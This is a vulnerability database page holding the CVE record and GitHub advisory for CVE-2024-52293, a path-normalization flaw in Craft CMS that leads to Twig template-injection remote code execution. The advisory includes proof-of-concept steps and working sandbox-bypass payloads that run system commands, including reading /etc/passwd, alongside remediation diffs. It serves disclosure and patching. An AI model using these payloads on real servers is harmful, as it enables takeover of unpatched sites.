CVE-2024-52293 (GCVE-0-2024-52293)
Vulnerability from cvelistv5 – Published: 2024-11-13 16:04 – Updated: 2024-11-13 18:56
VLAI?
Summary
Craft is a content management system (CMS). Prior to 4.12.2 and 5.4.3, Craft is missing normalizePath in the function FileHelper::absolutePath could lead to Remote Code Execution on the server via twig SSTI. This is a sequel to CVE-2023-40035. This vulnerability is fixed in 4.12.2 and 5.4.3.
Severity ?
7.2 (High)
CWE
- CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Assigner
References
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
Impacted products
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "craft_cms",
"vendor": "craftcms",
"versions": [
{
"lessThanOrEqual": "4.0.0-RC1",
"status": "affected",
"version": "0",
"versionType": "custom"
},
{
"lessThan": "4.12.2",
"status": "affected",
"version": "0",
"versionType": "custom"
},
{
"lessThanOrEqual": "5.0.0-RC1",
"status": "affected",
"version": "0",
"versionType": "custom"
},
{
"lessThan": "5.4.3",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-52293",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-11-13T18:54:41.908235Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-11-13T18:56:00.590Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "cms",
"vendor": "craftcms",
"versions": [
{
"status": "affected",
"version": "\u003e= 4.0.0-RC1, \u003c 4.12.2"
},
{
"status": "affected",
"version": "\u003e= 5.0.0-RC1, \u003c 5.4.3"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Craft is a content management system (CMS). Prior to 4.12.2 and 5.4.3, Craft is missing normalizePath in the function FileHelper::absolutePath could lead to Remote Code Execution on the server via twig SSTI. This is a sequel to CVE-2023-40035. This vulnerability is fixed in 4.12.2 and 5.4.3."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-22",
"description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-13T16:04:52.005Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/craftcms/cms/security/advisories/GHSA-f3cw-hg6r-chfv",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/craftcms/cms/security/advisories/GHSA-f3cw-hg6r-chfv"
},
{
"name": "https://github.com/craftcms/cms/commit/123e48a696de1e2f63ab519d4730eb3b87beaa58",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/craftcms/cms/commit/123e48a696de1e2f63ab519d4730eb3b87beaa58"
}
],
"source": {
"advisory": "GHSA-f3cw-hg6r-chfv",
"discovery": "UNKNOWN"
},
"title": "Craft has a Potential Remote Code Execution via missing path normalization \u0026 Twig SSTI"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2024-52293",
"datePublished": "2024-11-13T16:04:52.005Z",
"dateReserved": "2024-11-06T19:00:26.394Z",
"dateUpdated": "2024-11-13T18:56:00.590Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"fkie_nvd": {
"configurations": "[{\"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*\", \"versionStartExcluding\": \"4.0.0\", \"versionEndExcluding\": \"4.12.2\", \"matchCriteriaId\": \"B60EC9DE-A344-4BB8-AFBE-6202650BC911\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*\", \"versionStartExcluding\": \"5.0.0\", \"versionEndExcluding\": \"5.4.3\", \"matchCriteriaId\": \"03536C8C-DA2C-4758-A05E-EBFB10B04657\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:craftcms:craft_cms:4.0.0:rc1:*:*:*:*:*:*\", \"matchCriteriaId\": \"CC2F40FC-7C27-456A-B16D-679410D1D5CF\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:craftcms:craft_cms:4.0.0:rc2:*:*:*:*:*:*\", \"matchCriteriaId\": \"FBAA8227-04F8-404C-907B-B0162B325F5A\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:craftcms:craft_cms:4.0.0:rc3:*:*:*:*:*:*\", \"matchCriteriaId\": \"21B28E2C-327A-4CE6-ACAD-97E459712A55\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:craftcms:craft_cms:5.0.0:rc1:*:*:*:*:*:*\", \"matchCriteriaId\": \"8D8E02D1-601A-4E2B-B619-4775BFDB72D0\"}]}]}]",
"descriptions": "[{\"lang\": \"en\", \"value\": \"Craft is a content management system (CMS). Prior to 4.12.2 and 5.4.3, Craft is missing normalizePath in the function FileHelper::absolutePath could lead to Remote Code Execution on the server via twig SSTI. This is a sequel to CVE-2023-40035. This vulnerability is fixed in 4.12.2 and 5.4.3.\"}, {\"lang\": \"es\", \"value\": \"Craft es un sistema de gesti\\u00f3n de contenido (CMS). Antes de las versiones 4.12.2 y 5.4.3, Craft no ten\\u00eda normalizePath en la funci\\u00f3n FileHelper::absolutePath, lo que pod\\u00eda provocar la ejecuci\\u00f3n remota de c\\u00f3digo en el servidor a trav\\u00e9s de twig SSTI. Esta es una secuela de CVE-2023-40035. Esta vulnerabilidad se ha corregido en las versiones 4.12.2 y 5.4.3.\"}]",
"id": "CVE-2024-52293",
"lastModified": "2024-11-19T17:51:39.460",
"metrics": "{\"cvssMetricV31\": [{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\", \"baseScore\": 7.2, \"baseSeverity\": \"HIGH\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"HIGH\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 1.2, \"impactScore\": 5.9}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\", \"baseScore\": 7.2, \"baseSeverity\": \"HIGH\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"HIGH\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 1.2, \"impactScore\": 5.9}]}",
"published": "2024-11-13T16:15:19.307",
"references": "[{\"url\": \"https://github.com/craftcms/cms/commit/123e48a696de1e2f63ab519d4730eb3b87beaa58\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Patch\"]}, {\"url\": \"https://github.com/craftcms/cms/security/advisories/GHSA-f3cw-hg6r-chfv\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Exploit\", \"Vendor Advisory\"]}]",
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": "[{\"source\": \"security-advisories@github.com\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-22\"}]}]"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2024-52293\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-11-13T16:15:19.307\",\"lastModified\":\"2024-11-19T17:51:39.460\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Craft is a content management system (CMS). Prior to 4.12.2 and 5.4.3, Craft is missing normalizePath in the function FileHelper::absolutePath could lead to Remote Code Execution on the server via twig SSTI. This is a sequel to CVE-2023-40035. This vulnerability is fixed in 4.12.2 and 5.4.3.\"},{\"lang\":\"es\",\"value\":\"Craft es un sistema de gesti\u00f3n de contenido (CMS). Antes de las versiones 4.12.2 y 5.4.3, Craft no ten\u00eda normalizePath en la funci\u00f3n FileHelper::absolutePath, lo que pod\u00eda provocar la ejecuci\u00f3n remota de c\u00f3digo en el servidor a trav\u00e9s de twig SSTI. Esta es una secuela de CVE-2023-40035. Esta vulnerabilidad se ha corregido en las versiones 4.12.2 y 5.4.3.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":7.2,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.2,\"impactScore\":5.9},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":7.2,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.2,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-22\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*\",\"versionStartExcluding\":\"4.0.0\",\"versionEndExcluding\":\"4.12.2\",\"matchCriteriaId\":\"B60EC9DE-A344-4BB8-AFBE-6202650BC911\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*\",\"versionStartExcluding\":\"5.0.0\",\"versionEndExcluding\":\"5.4.3\",\"matchCriteriaId\":\"03536C8C-DA2C-4758-A05E-EBFB10B04657\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:craftcms:craft_cms:4.0.0:rc1:*:*:*:*:*:*\",\"matchCriteriaId\":\"CC2F40FC-7C27-456A-B16D-679410D1D5CF\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:craftcms:craft_cms:4.0.0:rc2:*:*:*:*:*:*\",\"matchCriteriaId\":\"FBAA8227-04F8-404C-907B-B0162B325F5A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:craftcms:craft_cms:4.0.0:rc3:*:*:*:*:*:*\",\"matchCriteriaId\":\"21B28E2C-327A-4CE6-ACAD-97E459712A55\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:craftcms:craft_cms:5.0.0:rc1:*:*:*:*:*:*\",\"matchCriteriaId\":\"8D8E02D1-601A-4E2B-B619-4775BFDB72D0\"}]}]}],\"references\":[{\"url\":\"https://github.com/craftcms/cms/commit/123e48a696de1e2f63ab519d4730eb3b87beaa58\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/craftcms/cms/security/advisories/GHSA-f3cw-hg6r-chfv\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2024-52293\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-11-13T18:54:41.908235Z\"}}}], \"affected\": [{\"cpes\": [\"cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*\"], \"vendor\": \"craftcms\", \"product\": \"craft_cms\", \"versions\": [{\"status\": \"affected\", \"version\": \"0\", \"versionType\": \"custom\", \"lessThanOrEqual\": \"4.0.0-RC1\"}, {\"status\": \"affected\", \"version\": \"0\", \"lessThan\": \"4.12.2\", \"versionType\": \"custom\"}, {\"status\": \"affected\", \"version\": \"0\", \"versionType\": \"custom\", \"lessThanOrEqual\": \"5.0.0-RC1\"}, {\"status\": \"affected\", \"version\": \"0\", \"lessThan\": \"5.4.3\", \"versionType\": \"custom\"}], \"defaultStatus\": \"unknown\"}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-11-13T18:55:51.255Z\"}}], \"cna\": {\"title\": \"Craft has a Potential Remote Code Execution via missing path normalization \u0026 Twig SSTI\", \"source\": {\"advisory\": \"GHSA-f3cw-hg6r-chfv\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.2, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"HIGH\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"craftcms\", \"product\": \"cms\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 4.0.0-RC1, \u003c 4.12.2\"}, {\"status\": \"affected\", \"version\": \"\u003e= 5.0.0-RC1, \u003c 5.4.3\"}]}], \"references\": [{\"url\": \"https://github.com/craftcms/cms/security/advisories/GHSA-f3cw-hg6r-chfv\", \"name\": \"https://github.com/craftcms/cms/security/advisories/GHSA-f3cw-hg6r-chfv\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/craftcms/cms/commit/123e48a696de1e2f63ab519d4730eb3b87beaa58\", \"name\": \"https://github.com/craftcms/cms/commit/123e48a696de1e2f63ab519d4730eb3b87beaa58\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Craft is a content management system (CMS). Prior to 4.12.2 and 5.4.3, Craft is missing normalizePath in the function FileHelper::absolutePath could lead to Remote Code Execution on the server via twig SSTI. This is a sequel to CVE-2023-40035. This vulnerability is fixed in 4.12.2 and 5.4.3.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-22\", \"description\": \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2024-11-13T16:04:52.005Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2024-52293\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2024-11-13T18:56:00.590Z\", \"dateReserved\": \"2024-11-06T19:00:26.394Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2024-11-13T16:04:52.005Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
GHSA-F3CW-HG6R-CHFV
Vulnerability from github – Published: 2024-11-13 14:16 – Updated: 2025-07-16 21:01
VLAI?
Summary
Craft CMS vulnerable to Potential Remote Code Execution via missing path normalization & Twig SSTI
Details
Summary
Missing normalizePath in the function FileHelper::absolutePath could lead to Remote Code Execution on the server via twig SSTI.
(Post-authentication, ALLOW_ADMIN_CHANGES=true)
Details
Note: This is a sequel to CVE-2023-40035
In src/helpers/FileHelper.php#L106-L137, the function absolutePath returned $from . $ds . $to without path normalization:
/**
* Returns an absolute path based on a source location or the current working directory.
*
* @param string $to The target path.
* @param string|null $from The source location. Defaults to the current working directory.
* @param string $ds the directory separator to be used in the normalized result. Defaults to `DIRECTORY_SEPARATOR`.
* @return string
* @since 4.3.5
*/
public static function absolutePath(
string $to,
?string $from = null,
string $ds = DIRECTORY_SEPARATOR,
): string {
$to = static::normalizePath($to, $ds);
// Already absolute?
if (
str_starts_with($to, $ds) ||
preg_match(sprintf('/^[A-Z]:%s/', preg_quote($ds, '/')), $to)
) {
return $to;
}
if ($from === null) {
$from = FileHelper::normalizePath(getcwd(), $ds);
} else {
$from = static::absolutePath($from, ds: $ds);
}
return $from . $ds . $to;
}
This could leads to multiple security risks, one of them is in src/services/Security.php#L201-L220 where ../templates/poc is not considered a system dir.
Let's see what happens after calling isSystemDir("../templates/poc"):
/**
* Returns whether the given file path is located within or above any system directories.
*
* @param string $path
* @return bool
* @since 5.4.2
*/
public function isSystemDir(string $path): bool // $path = "../templates/poc"
{
$path = FileHelper::absolutePath($path, '/'); // $path = "/var/www/html/web//../templates/poc"
foreach (Craft::$app->getPath()->getSystemPaths() as $dir) {
$dir = FileHelper::absolutePath($dir, '/'); // $dir = "/var/www/html/templates"
if (str_starts_with("$path/", "$dir/") || str_starts_with("$dir/", "$path/")) { // if (false || false)
return true;
}
}
return false; // We're here!
}
Now that the path ../templates/poc can bypass isSystemDir, it will also bypass the function validatePath in src/fs/Local.php#L124-L136:
/**
* @param string $attribute
* @param array|null $params
* @param InlineValidator $validator
* @return void
* @since 4.4.6
*/
public function validatePath(string $attribute, ?array $params, InlineValidator $validator): void
{
if (Craft::$app->getSecurity()->isSystemDir($this->getRootPath())) {
$validator->addError($this, $attribute, Craft::t('app', 'Local filesystems cannot be located within or above system directories.'));
}
}
We can now create a Local filesystem within the system directories, particularly in /var/www/html/templates/poc
Then create a new asset volume with that filesystem, upload a poc.ttml file with twig code and execute using a new route with template path poc/poc.ttml
Although craftcms does sandbox twig ssti, the list in src/web/twig/Extension.php#L180-L268 is still incomplete.
{{['id'] has some 'system'}}
{{['ls'] has every 'passthru'}}
{{['cat /etc/passwd']|find('system')}}
{{['id;pwd;ls -altr /']|find('passthru')}}
These payloads still work, see twigphp/Twig/src/Extension/CoreExtension.php#getFilters() and twigphp/Twig/src/Extension/CoreExtension.php#getOperators() for more informations.
PoC
- Craft CMS was installed using https://craftcms.com/docs/4.x/installation.html#quick-start
mkdir craftcms && cd craftcms
ddev config --project-type=craftcms --docroot=web --create-docroot
ddev composer create -y --no-scripts "craftcms/craft"
ddev craft install
php craft setup/security-key
ddev start
- Create a new filesystem with base path
../templates/poc
Notice that the poc directory was created
- Create a new asset volume using the
pocfilesystem
Upload a poc.ttml file with RCE template code
{{'<pre>'}}
{{ 8*8 }}
{{['id'] has some 'system'}}
{{['ls'] has every 'passthru'}}
{{['cat /etc/passwd']|find('system')}}
{{['id;pwd;ls -altr /']|find('passthru')}}
Note: find was added to twig last month. If you're running this poc on an older version of twig try removing the last 2 lines.
- Create a new route
*with templatepoc/poc.ttml
- This leads to Remote Code Execution on arbitrary route
/*
Remediation
diff --git a/src/helpers/FileHelper.php b/src/helpers/FileHelper.php
index 0c2da884a7..ac23ce556a 100644
--- a/src/helpers/FileHelper.php
+++ b/src/helpers/FileHelper.php
@@ -133,7 +133,7 @@ class FileHelper extends \yii\helpers\FileHelper
$from = static::absolutePath($from, ds: $ds);
}
- return $from . $ds . $to;
+ return FileHelper::normalizePath($from . $ds . $to);
}
/**
See twigphp/Twig/src/Extension/CoreExtension.php for updated filters and operators, a possible fix could look like:
diff --git a/src/web/twig/Extension.php b/src/web/twig/Extension.php
index efff2d2412..756f452f8b 100644
--- a/src/web/twig/Extension.php
+++ b/src/web/twig/Extension.php
@@ -225,6 +225,9 @@ class Extension extends AbstractExtension implements GlobalsInterface
new TwigFilter('lcfirst', [$this, 'lcfirstFilter']),
new TwigFilter('literal', [$this, 'literalFilter']),
new TwigFilter('map', [$this, 'mapFilter'], ['needs_environment' => true]),
+ new TwigFilter('find', [$this, 'find'], ['needs_environment' => true]),
+ new TwigFilter('has some' => ['precedence' => 20, 'class' => HasSomeBinary::class, 'associativity' => ExpressionParser::OPERATOR_LEFT]),
+ new TwigFilter('has every' => ['precedence' => 20, 'class' => HasEveryBinary::class, 'associativity' => ExpressionParser::OPERATOR_LEFT]),
new TwigFilter('markdown', [$this, 'markdownFilter'], ['is_safe' => ['html']]),
new TwigFilter('md', [$this, 'markdownFilter'], ['is_safe' => ['html']]),
new TwigFilter('merge', [$this, 'mergeFilter']),
Impact
Take control of vulnerable systems, Data exfiltrations, Malware execution, Pivoting, etc.
Although the vulnerability is exploitable only in the authenticated users, configuration with ALLOW_ADMIN_CHANGES=true, there is still a potential security threat (Remote Code Execution)
Severity ?
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.12.1"
},
"package": {
"ecosystem": "Packagist",
"name": "craftcms/cms"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0-RC1"
},
{
"fixed": "4.12.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 5.4.2"
},
"package": {
"ecosystem": "Packagist",
"name": "craftcms/cms"
},
"ranges": [
{
"events": [
{
"introduced": "5.0.0-RC1"
},
{
"fixed": "5.4.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-52293"
],
"database_specific": {
"cwe_ids": [
"CWE-22",
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2024-11-13T14:16:38Z",
"nvd_published_at": "2024-11-13T16:15:19Z",
"severity": "HIGH"
},
"details": "### Summary\n\nMissing `normalizePath` in the function `FileHelper::absolutePath` could lead to Remote Code Execution on the server via twig SSTI.\n\n`(Post-authentication, ALLOW_ADMIN_CHANGES=true)`\n\n### Details\n\nNote: This is a sequel to [CVE-2023-40035](https://github.com/craftcms/cms/security/advisories/GHSA-44wr-rmwq-3phw)\n\nIn [`src/helpers/FileHelper.php#L106-L137`](https://github.com/craftcms/cms/blob/5e56c6d168524ed02f0620c9bc1c9750f5b94e3b/src/helpers/FileHelper.php#L106-L137), the function `absolutePath` returned `$from . $ds . $to` without path normalization:\n\n```php\n/**\n * Returns an absolute path based on a source location or the current working directory.\n *\n * @param string $to The target path.\n * @param string|null $from The source location. Defaults to the current working directory.\n * @param string $ds the directory separator to be used in the normalized result. Defaults to `DIRECTORY_SEPARATOR`.\n * @return string\n * @since 4.3.5\n */\npublic static function absolutePath(\n string $to,\n ?string $from = null,\n string $ds = DIRECTORY_SEPARATOR,\n): string {\n $to = static::normalizePath($to, $ds);\n\n // Already absolute?\n if (\n str_starts_with($to, $ds) ||\n preg_match(sprintf(\u0027/^[A-Z]:%s/\u0027, preg_quote($ds, \u0027/\u0027)), $to)\n ) {\n return $to;\n }\n\n if ($from === null) {\n $from = FileHelper::normalizePath(getcwd(), $ds);\n } else {\n $from = static::absolutePath($from, ds: $ds);\n }\n\n return $from . $ds . $to;\n}\n```\n\nThis could leads to multiple security risks, one of them is in [`src/services/Security.php#L201-L220`](https://github.com/craftcms/cms/blob/5e56c6d168524ed02f0620c9bc1c9750f5b94e3b/src/services/Security.php#L201-L220) where `../templates/poc` is not considered a system dir.\n\nLet\u0027s see what happens after calling `isSystemDir(\"../templates/poc\")`:\n\n```php\n/**\n * Returns whether the given file path is located within or above any system directories.\n *\n * @param string $path\n * @return bool\n * @since 5.4.2\n */\npublic function isSystemDir(string $path): bool // $path = \"../templates/poc\"\n{\n $path = FileHelper::absolutePath($path, \u0027/\u0027); // $path = \"/var/www/html/web//../templates/poc\"\n\n foreach (Craft::$app-\u003egetPath()-\u003egetSystemPaths() as $dir) {\n $dir = FileHelper::absolutePath($dir, \u0027/\u0027); // $dir = \"/var/www/html/templates\"\n if (str_starts_with(\"$path/\", \"$dir/\") || str_starts_with(\"$dir/\", \"$path/\")) { // if (false || false)\n return true;\n }\n }\n\n return false; // We\u0027re here!\n}\n```\n\nNow that the path `../templates/poc` can bypass `isSystemDir`, it will also bypass the function `validatePath` in [`src/fs/Local.php#L124-L136`](https://github.com/craftcms/cms/blob/5e56c6d168524ed02f0620c9bc1c9750f5b94e3b/src/fs/Local.php#L124-L136):\n```php\n/**\n * @param string $attribute\n * @param array|null $params\n * @param InlineValidator $validator\n * @return void\n * @since 4.4.6\n */\npublic function validatePath(string $attribute, ?array $params, InlineValidator $validator): void\n{\n if (Craft::$app-\u003egetSecurity()-\u003eisSystemDir($this-\u003egetRootPath())) {\n $validator-\u003eaddError($this, $attribute, Craft::t(\u0027app\u0027, \u0027Local filesystems cannot be located within or above system directories.\u0027));\n }\n}\n```\n\nWe can now create a Local filesystem within the system directories, particularly in `/var/www/html/templates/poc`\n\nThen create a new asset volume with that filesystem, upload a `poc.ttml` file with twig code and execute using a new route with template path `poc/poc.ttml`\n\nAlthough craftcms does sandbox twig ssti, the list in [src/web/twig/Extension.php#L180-L268](https://github.com/craftcms/cms/blob/5e56c6d168524ed02f0620c9bc1c9750f5b94e3b/src/web/twig/Extension.php#L180-L268) is still incomplete.\n\n\n```js\n{{[\u0027id\u0027] has some \u0027system\u0027}}\n{{[\u0027ls\u0027] has every \u0027passthru\u0027}}\n{{[\u0027cat /etc/passwd\u0027]|find(\u0027system\u0027)}}\n{{[\u0027id;pwd;ls -altr /\u0027]|find(\u0027passthru\u0027)}}\n```\n\nThese payloads still work, see [twigphp/Twig/src/Extension/CoreExtension.php#getFilters()](https://github.com/twigphp/Twig/blob/a3496d148b75e270065ed8f03758f7b09b3a9793/src/Extension/CoreExtension.php#L196-L247) and [twigphp/Twig/src/Extension/CoreExtension.php#getOperators()](https://github.com/twigphp/Twig/blob/a3496d148b75e270065ed8f03758f7b09b3a9793/src/Extension/CoreExtension.php#L291-L333) for more informations.\n\n### PoC\n\n1. Craft CMS was installed using https://craftcms.com/docs/4.x/installation.html#quick-start\n\n```sh\nmkdir craftcms \u0026\u0026 cd craftcms\nddev config --project-type=craftcms --docroot=web --create-docroot\nddev composer create -y --no-scripts \"craftcms/craft\"\nddev craft install\nphp craft setup/security-key\nddev start\n```\n\n\u003cimg width=\"1280\" alt=\"start\" src=\"https://github.com/user-attachments/assets/f8bcc22a-6ffd-40a5-81c6-c077fa4ce1d3\"\u003e\n\n2. Create a new filesystem with base path `../templates/poc`\n\n\u003cimg width=\"1280\" alt=\"filesystem\" src=\"https://github.com/user-attachments/assets/fe78e023-bd51-4fc1-a22e-dcfa5baf266b\"\u003e\n\nNotice that the `poc` directory was created\n\n\u003cimg width=\"167\" alt=\"dir\" src=\"https://github.com/user-attachments/assets/ccc45ce8-8555-4aae-ae48-320a630e7d79\"\u003e\n\n3. Create a new asset volume using the `poc` filesystem\n\n\u003cimg width=\"1280\" alt=\"asset\" src=\"https://github.com/user-attachments/assets/b5530766-11b4-4e45-ae58-82f81fc2db00\"\u003e\n\nUpload a `poc.ttml` file with RCE template code\n\n```js\n{{\u0027\u003cpre\u003e\u0027}}\n{{ 8*8 }}\n{{[\u0027id\u0027] has some \u0027system\u0027}}\n{{[\u0027ls\u0027] has every \u0027passthru\u0027}}\n{{[\u0027cat /etc/passwd\u0027]|find(\u0027system\u0027)}}\n{{[\u0027id;pwd;ls -altr /\u0027]|find(\u0027passthru\u0027)}}\n```\n\nNote: `find` was added to twig [last month](https://github.com/twigphp/Twig/commit/4e262511930e408e4c7eda07b1c977f2ea98575c). If you\u0027re running this poc on an older version of twig try removing the last 2 lines.\n\n\u003cimg width=\"1280\" alt=\"upload\" src=\"https://github.com/user-attachments/assets/63e65beb-2ede-4141-85d2-e7d21cd4b8ad\"\u003e\n\n\n\n4. Create a new route `*` with template `poc/poc.ttml`\n\n\u003cimg width=\"1280\" alt=\"route\" src=\"https://github.com/user-attachments/assets/b92d9340-b6a5-40d8-a8e8-ddab5cfc9f21\"\u003e\n\n5. This leads to Remote Code Execution on arbitrary route `/*`\n\n\u003cimg width=\"454\" alt=\"rce\" src=\"https://github.com/user-attachments/assets/19765f6c-1c28-4a0b-a89c-25f6f05ceca6\"\u003e\n\n### 